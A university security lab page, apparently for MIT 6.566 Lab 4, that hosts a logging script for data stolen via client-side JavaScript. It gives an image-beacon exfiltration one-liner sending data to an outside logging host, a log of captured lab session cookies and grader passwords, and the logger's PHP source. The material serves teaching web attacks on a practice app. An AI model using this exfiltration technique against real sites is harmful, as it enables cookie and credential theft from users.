You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2026/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Fri, 03 Apr 2026 07:32:35 +0000: jiaqian: PyZoobarLogin=grader#ac91cea5e1335310332623b652769fbb8229e4ffe20b72db8a39fa30c6418adc Fri, 03 Apr 2026 07:32:28 +0000: jiaqian: PyZoobarLogin=grader#4dd5d3ab5e927c88aee1712cd43498431e8db75dbb7e3c3d92ff6b20d6309af4 Fri, 03 Apr 2026 07:32:11 +0000: jiaqian: PyZoobarLogin=grader#c4add2ad9d8b07e0efc64ee7381e14b6067f325ac9fa7f6ed927b68b8dc6485c Fri, 03 Apr 2026 07:29:34 +0000: jiaqian: PyZoobarLogin=test#2b448c521440b69de2b3375188a8066a3c64b0d308dc5fec89efb133944554ef Fri, 03 Apr 2026 07:26:30 +0000: jiaqian: PyZoobarLogin=grader#42c0ec07b30e9ea7916c69de83514284db8ab9d1a665fa152231a386e323370b Fri, 03 Apr 2026 07:26:23 +0000: jiaqian: PyZoobarLogin=grader#92176a17d0ed52a759cc50992210dda5c161a5856333ed8f6ae1011c278710a8 Fri, 03 Apr 2026 07:26:07 +0000: jiaqian: PyZoobarLogin=grader#82bbe46c12cad3b661a60ffd6836a8c7c12e905a4653bf7cc31a45bda8bfd4af Fri, 03 Apr 2026 07:21:46 +0000: jiaqian: PyZoobarLogin=grader#f4ac01482cbee6723aebf963e5bb8474de9ac4d8b8fe72a9eb0d2baa8579a025 Fri, 03 Apr 2026 07:21:29 +0000: jiaqian: PyZoobarLogin=grader#a34bcde91665441369d9c4c3ccfc50c3073fbcee655f6d211b9f362eb66776d4 Fri, 03 Apr 2026 07:19:47 +0000: jiaqian: PyZoobarLogin=grader#217910c32885929eb35d60eceabf811009d71f01308d6c8e463c6592f73c9f43 Fri, 03 Apr 2026 07:13:09 +0000: jiaqian: PyZoobarLogin=test#110e64eca73c8af3c28e64fadd7405217bd96dc70db8baa0a8a466f9199d0e7b Fri, 03 Apr 2026 04:21:28 +0000: jiaqian: PyZoobarLogin=grader#927f180113343aff784dae965049befa2b778442f80f337e0db804376707d95c Fri, 03 Apr 2026 04:21:20 +0000: jiaqian: PyZoobarLogin=grader#0a01d7e7eb5a72fdc369dab122fdc363e114ec283da5bd506e950122d9a8283d Fri, 03 Apr 2026 04:21:10 +0000: jiaqian: PyZoobarLogin=grader3#bfc981dd48264bc9a0048e93a596091d7f9e41dffcf23111bbd8b8dcc15a3a82 Fri, 03 Apr 2026 04:21:04 +0000: jiaqian: PyZoobarLogin=grader2#11616aea79bf8db61da86ba3b1c292feece2dd56de6ceeefbfd5662b5bd8f35c Fri, 03 Apr 2026 04:20:57 +0000: jiaqian: PyZoobarLogin=grader1#d670e186ea4be9531334829b832d142321d0b7d3898673a2a330c1169f535f75 Fri, 03 Apr 2026 04:20:51 +0000: jiaqian: PyZoobarLogin=grader#18e7e80b21a2a9f5815f0e5886feedacbf6b463c79a2b23d10edbba35e52836e Fri, 03 Apr 2026 04:17:44 +0000: jiaqian: PyZoobarLogin=jiaqian#4e5a62e40416a4969058b0af4f2ad5bdb9af6d8d41b048ac463d2631c42f1091 Thu, 02 Apr 2026 19:52:57 +0000: powellz0: grader/ZTOJGJORNJSX Thu, 02 Apr 2026 19:49:26 +0000: powellz0: test/test Thu, 02 Apr 2026 19:18:07 +0000: powellz0: grader/KIXEXBGBUUYL Thu, 02 Apr 2026 19:17:56 +0000: powellz0: grader/ASHAVALDHXSM Thu, 02 Apr 2026 19:16:13 +0000: powellz0: test1/test1 Thu, 02 Apr 2026 19:12:02 +0000: powellz0: grader/TBSPVXOAJGJG Thu, 02 Apr 2026 19:10:14 +0000: powellz0: a/b Thu, 02 Apr 2026 19:09:57 +0000: powellz0: test/test Wed, 01 Apr 2026 21:38:23 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 21:36:42 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 21:35:48 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 21:33:14 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 21:30:03 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 21:28:01 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 21:26:16 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 21:21:23 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 21:15:08 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 21:14:52 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 21:12:48 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 21:11:42 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 18:48:49 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 17:47:38 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 17:44:22 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Wed, 01 Apr 2026 17:41:15 +0000: alekstv: PyZoobarLogin=a#3cd3d322bdaa248a75803b1c75db692cf88397c5530f69b7c26e85e44e443749 Tue, 31 Mar 2026 23:14:51 +0000: my-username: grader/GNCZCTPNNLYW Tue, 31 Mar 2026 23:14:43 +0000: my-username: grader/WWZYQXHDSNKB Tue, 31 Mar 2026 23:14:04 +0000: my-username: PyZoobarLogin=grader#2ccf7bce8d8af81f3b952e088941f83aeb28ef451e86e889f042e2dc3d51d0af Tue, 31 Mar 2026 23:13:55 +0000: my-username: PyZoobarLogin=grader#d107544ff5945ab6a9438bd11ad2bb49bfdcbe287317087a370e27fb41723fbf Tue, 31 Mar 2026 23:13:38 +0000: my-username: PyZoobarLogin=grader#e812dbf6fd05d49e35d2c90779186b3f99bfce29fc352d68dd9f30414c3ae02f Tue, 31 Mar 2026 20:01:35 +0000: powellz0: PyZoobarLogin=grader#c1e1e74f940df9e312a02db72e2df4961342dd1346275ccfe8c6071c62965d0c Tue, 31 Mar 2026 20:01:29 +0000: powellz0: PyZoobarLogin=grader#1ea9fb74c0786dbb6747f6a834a0882f92aeff191dba573360e4f317a80f4102 Tue, 31 Mar 2026 20:01:14 +0000: powellz0: PyZoobarLogin=grader#d0acbae365c6d40cf45c2802375487a73e6bb38f22ff77991c0ee75e1e61f8ff Tue, 31 Mar 2026 20:00:27 +0000: powellz0: PyZoobarLogin=test#3115f72f58ed417a174722dc43b20abc77c30ada302cd92a7bb8e376bd0182ff Tue, 31 Mar 2026 19:52:04 +0000: powellz0: PyZoobarLogin=test#3115f72f58ed417a174722dc43b20abc77c30ada302cd92a7bb8e376bd0182ff Tue, 31 Mar 2026 19:42:46 +0000: powellz0: PyZoobarLogin=test#3115f72f58ed417a174722dc43b20abc77c30ada302cd92a7bb8e376bd0182ff Tue, 31 Mar 2026 19:42:21 +0000: powellz0: PyZoobarLogin=test#3115f72f58ed417a174722dc43b20abc77c30ada302cd92a7bb8e376bd0182ff Tue, 31 Mar 2026 19:42:01 +0000: powellz0: PyZoobarLogin=test#3115f72f58ed417a174722dc43b20abc77c30ada302cd92a7bb8e376bd0182ff Tue, 31 Mar 2026 19:40:21 +0000: powellz0: PyZoobarLogin=test#3115f72f58ed417a174722dc43b20abc77c30ada302cd92a7bb8e376bd0182ff Tue, 31 Mar 2026 19:39:59 +0000: powellz0: PyZoobarLogin=test#3115f72f58ed417a174722dc43b20abc77c30ada302cd92a7bb8e376bd0182ff Tue, 31 Mar 2026 19:39:52 +0000: powellz0: PyZoobarLogin=test#3115f72f58ed417a174722dc43b20abc77c30ada302cd92a7bb8e376bd0182ff Tue, 31 Mar 2026 19:39:36 +0000: powellz0: PyZoobarLogin=test#3115f72f58ed417a174722dc43b20abc77c30ada302cd92a7bb8e376bd0182ff Tue, 31 Mar 2026 19:37:55 +0000: powellz0: PyZoobarLogin=grader#ed488c1c2bb882a6dc1729f67f8f66f9e780c049ac66413b2e1ca953638a9f59 Tue, 31 Mar 2026 19:37:49 +0000: powellz0: PyZoobarLogin=grader#4edd0f0ec1e720a0859d72d30eef61f1cf36d3ebdcf8f8fddc38e69c49cb1b8f Tue, 31 Mar 2026 19:37:40 +0000: powellz0: PyZoobarLogin=grader3#bbec071da409c6b91b3b9832deef0f386b31e88dbfb2eb9c28a86f0fe822b821 Tue, 31 Mar 2026 19:37:35 +0000: powellz0: PyZoobarLogin=grader2#3d36c3bd13a3cdfeaf26dc811d3f52f687e565f5e990cafbbdf7abb083f2d319 Tue, 31 Mar 2026 19:37:30 +0000: powellz0: PyZoobarLogin=grader1#d6a38477487eb497b4a8a3139fbccccb52297d3323750c92ef9cdda5026f779b Tue, 31 Mar 2026 19:37:26 +0000: powellz0: PyZoobarLogin=grader#4120a7f6da4e5a69b7b6c7b5c0779604b9208a5c831f26966bfc9c3e3419860f Tue, 31 Mar 2026 19:36:49 +0000: powellz0: PyZoobarLogin=test#5e8a77170f81d09009febaee4b9f09149aaf46f8454227ef0dd2ac7210c214a1 Tue, 31 Mar 2026 02:11:51 +0000: lab4: grader/XUPOFVAIYYAM Tue, 31 Mar 2026 02:11:44 +0000: lab4: grader/ONEIRGIIQNDA Tue, 31 Mar 2026 02:11:18 +0000: lab4: PyZoobarLogin=grader#fdac7fc58765e10a2a7cf5bb2896393cd458024b1bfd2e07392039a11482af96 Tue, 31 Mar 2026 02:11:11 +0000: lab4: PyZoobarLogin=grader#143f5d7148ce53f8030f2c359462705319c9775362a157b6e38c281beb75baca Tue, 31 Mar 2026 02:10:55 +0000: lab4: PyZoobarLogin=grader#abfb667e7496adcf5e698fd51151806fd088ddf2ec1ec508ce3ad64d0869e007 Tue, 31 Mar 2026 02:08:54 +0000: lab4: grader/NCGJDVKPDZSD Tue, 31 Mar 2026 02:08:46 +0000: lab4: grader/XJLAWUSAPNCY Tue, 31 Mar 2026 02:08:19 +0000: lab4: PyZoobarLogin=grader#8a38596e7b2c798f9fe17ff87d3b90e6f66fc46d6299ccaeb06fed4577a052b0 Tue, 31 Mar 2026 02:08:11 +0000: lab4: PyZoobarLogin=grader#35977276232629de71fa7b65c3d385d596c08174554e887e4ec82b32a3b6e756 Tue, 31 Mar 2026 02:07:55 +0000: lab4: PyZoobarLogin=grader#aa9ea10f1c117caf620ea74c9af479241f22d3cc994ecfdaca946addbdc0a579 Tue, 31 Mar 2026 02:05:20 +0000: lab4: grader/PKKMPXVITLQR Tue, 31 Mar 2026 02:05:13 +0000: lab4: grader/YZWWLNMTWJQJ Tue, 31 Mar 2026 02:04:48 +0000: lab4: PyZoobarLogin=grader#43d8baee38a8c8f26f55aa4700589d8b9d3acc571616e680e60dc589a32b489e Tue, 31 Mar 2026 02:04:41 +0000: lab4: PyZoobarLogin=grader#1372075902b87a9c76fb1dd4847d058987cea1209aa6d87d32f6ecbd41c54545 Tue, 31 Mar 2026 02:04:26 +0000: lab4: PyZoobarLogin=grader#851bfa360cbe60af0e05efeda4ed54fbad2606dfd0b02ff4d9c8a9e6816b6711 Tue, 31 Mar 2026 02:01:24 +0000: lab4: grader/HAZVWJXEELLM Tue, 31 Mar 2026 02:01:16 +0000: lab4: grader/ZSOHKGRWSSLF Tue, 31 Mar 2026 02:00:51 +0000: lab4: PyZoobarLogin=grader#c977be977a7a72f3322b445688f32f1b6fb60647796d6fb12d524f2b20a1b825 Tue, 31 Mar 2026 02:00:43 +0000: lab4: PyZoobarLogin=grader#1d2884a080433818e2b60c4da10e4e5b16b9425a2abce0f0fec10d7d59b42c1d Tue, 31 Mar 2026 02:00:27 +0000: lab4: PyZoobarLogin=grader#f98d46f74a702403064a559764fa258dbc06117340e9f7ed506f0b110635f2ae Tue, 31 Mar 2026 01:55:09 +0000: lab4: grader/XHZBTAUDOTBI Tue, 31 Mar 2026 01:55:02 +0000: lab4: grader/HDBHTHGRAQFT Tue, 31 Mar 2026 01:54:37 +0000: lab4: PyZoobarLogin=grader#537196eea6f1d1b4dd378f5b25332decc58e760950bccd75c6ae8cd1f0f6e457 Tue, 31 Mar 2026 01:54:31 +0000: lab4: PyZoobarLogin=grader#3f71227b5c30279a4534966abfc87864be7d9caa871f7a2862a001b46eb4742d Tue, 31 Mar 2026 01:54:14 +0000: lab4: PyZoobarLogin=grader#674bfac4e557e9954705845c929c6c458b1de759e1b740f0275cacb48edfe050 Tue, 31 Mar 2026 01:51:14 +0000: lab4: grader/XKKFGCHHOXBO Tue, 31 Mar 2026 01:50:49 +0000: lab4: PyZoobarLogin=grader#e4c8e76cd99ebbbf61d17adcde551d29d85436db5c756911bcfd748160408d45 Tue, 31 Mar 2026 01:50:42 +0000: lab4: PyZoobarLogin=grader#8117768672d1a31686c11872ea9328742267b6385295d3cf4741272a174bffc7 Tue, 31 Mar 2026 01:50:27 +0000: lab4: PyZoobarLogin=grader#535ae2db9fa1039cd6ec6fe61c40dccd5efcb8c389cc055600fef0c5f5cc10d7 Tue, 31 Mar 2026 01:45:48 +0000: lab4: grader/RWZJTFXCZEKP Tue, 31 Mar 2026 01:45:41 +0000: lab4: grader/JRWCRZLMNWOT Tue, 31 Mar 2026 01:45:15 +0000: lab4: PyZoobarLogin=grader#4b9eb24755e37cfd57ddcc504593ed4b58bc0a2eed065831aff5f5d0baeee86a Tue, 31 Mar 2026 01:45:08 +0000: lab4: PyZoobarLogin=grader#0a34a89a064adb592dd98a4caa67488fa3a27041885d2f9f40c572dfda60057a Tue, 31 Mar 2026 01:44:53 +0000: lab4: PyZoobarLogin=grader#296cccc82f5c10d0d6ee629cb88b58798642bd01827cf2e8064c2592fdaec07e Tue, 31 Mar 2026 01:40:20 +0000: lab4: grader/UWHCRHGGFASK
In case you are curious, here is the source code of this page.
<?php header("Access-Control-Allow-Origin: *"); do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.566-2026-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.566/2026/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.566-2026-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>